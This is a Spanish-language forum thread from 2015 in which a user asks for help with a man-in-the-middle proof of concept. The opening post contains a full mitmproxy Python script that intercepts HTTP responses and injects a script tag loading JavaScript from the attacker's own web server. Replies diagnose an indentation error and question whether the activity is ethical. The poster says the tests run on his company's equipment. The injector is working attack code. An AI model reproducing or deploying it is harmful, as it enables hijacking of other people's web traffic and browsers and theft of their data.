inyectar código MITM a HTTP AYUDA

Iniciado por p4tria, 24 Octubre 2015, 12:49 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

p4tria

24 Octubre 2015, 12:49 PM Ultima modificación: 24 Octubre 2015, 12:51 PM por slkntkyo
Buenas,

estoy tratando de hacer una POC que me he encontrado, y no soy capaz de inyectar el código que quiero a ver si me podéis echar un cable.

Estoy usando

KALI 2
--------
mitmproxy

y un script que me he encontrado por ahí para inyectar código JS.

# Usage: mitmdump -s "js_injector.py src"
# (this script works best with --anticache)
from bs4 import BeautifulSoup
from libmproxy.protocol.http import decoded

# On start of proxy server ask for src as an argument
def start(context, argv):
   if len(argv) != 2:
       raise ValueError('Usage: -s "js_injector.py src"')
   context.src_url = argv[1]


def response(context, flow):
   if flow.request.host in context.src_url:
       return # Make sure JS isn't injected to itself
   with decoded(flow.response):  # Remove content encoding (gzip, ...)
       html = BeautifulSoup(flow.response.content)
       if html.body:
           script = html.new_tag(
               "script",
               src=context.src_url,
               type='application/javascript')
           html.body.insert(0, script)
           flow.response.content = str(html)
           context.log("Script injected.")

Hago la redirección de tráfico HTTP y HTTPS al 8080 de mitmproxy; y el problema viene cuando trato de hacer la inyección llamando al script de java que subo a mi
python -m SimpleHTTPServer 80



alguna idea de este error?



engel lex

#1
24 Octubre 2015, 16:17 PM
es un problema de sangría... python es sensible con los espacios a la izquierda, distningue espacios de tabulaciones y la cantidad de los mismos
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

k0pkill3r

#2
24 Octubre 2015, 20:10 PM
el foro no apoya a ilegales......o no éticos

paso de buscar citas......

p4tria

#3
28 Octubre 2015, 21:11 PM
Cita de: k0pkill3r en 24 Octubre 2015, 20:10 PM
el foro no apoya a ilegales......o no éticos

paso de buscar citas......

como no me conoces de nada entiendo que tienes razones suficientes (por mi nick o no sé por qué) para decirme que realizo acciones ilegales/no éticos

no sé qué tiene de ilegal realizar POC's en los equipos de mi propia empresa, para poner tonterías mejor no escribas; o si lo haces no prejuzgues

Cita de: engel lex en 24 Octubre 2015, 16:17 PM
es un problema de sangría... python es sensible con los espacios a la izquierda, distningue espacios de tabulaciones y la cantidad de los mismos

muchas gracias ya está solucionado  ;-)
Imprimir
Ir Arriba Páginas1
Acciones del Usuario